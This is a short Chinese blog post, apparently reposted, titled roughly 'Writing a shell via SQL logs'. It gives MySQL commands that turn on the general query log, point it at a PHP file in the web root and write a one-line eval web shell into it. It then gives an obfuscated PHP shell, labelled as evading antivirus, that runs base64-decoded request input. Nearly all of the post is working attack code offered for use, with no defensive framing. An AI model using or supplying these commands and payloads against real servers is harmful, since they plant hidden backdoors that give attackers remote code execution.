SQL语句利用日志写shell

时间：2018-03-17 15:26:59 阅读：272 评论：0 收藏：0 [点我收藏+]

标签：利用 log html body like 语句 sele lob t权限

outfile被禁止，或者写入文件被拦截；

在数据库中操作如下：（必须是root权限）

show variables like ‘%general%‘;  #查看配置
 
set global general_log = on;  #开启general log模式
 
set global general_log_file = ‘/var/www/html/1.php‘;   #设置日志目录为shell地址
 
select ‘<?php eval($_POST[cmd]);?>‘  #写入shell

SQL查询免杀shell的语句

SELECT "<?php $p = array(‘f‘=>‘a‘,‘pffff‘=>‘s‘,‘e‘=>‘fffff‘,‘lfaaaa‘=>‘r‘,‘nnnnn‘=>‘t‘);$a = array_keys($p);$_=$p[‘pffff‘].$p[‘pffff‘].$a[2];$_= ‘a‘.$_.‘rt‘;$_(base64_decode($_REQUEST[‘username‘]));?>"

SQL语句利用日志写shell

标签：利用 log html body like 语句 sele lob t权限

原文地址：https://www.cnblogs.com/hookjoy/p/8589509.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

2021年07月29日 (22)
2021年07月28日 (40)
2021年07月27日 (32)
2021年07月26日 (79)
2021年07月23日 (29)
2021年07月22日 (30)
2021年07月21日 (42)
2021年07月20日 (16)
2021年07月19日 (90)
2021年07月16日 (35)

周排行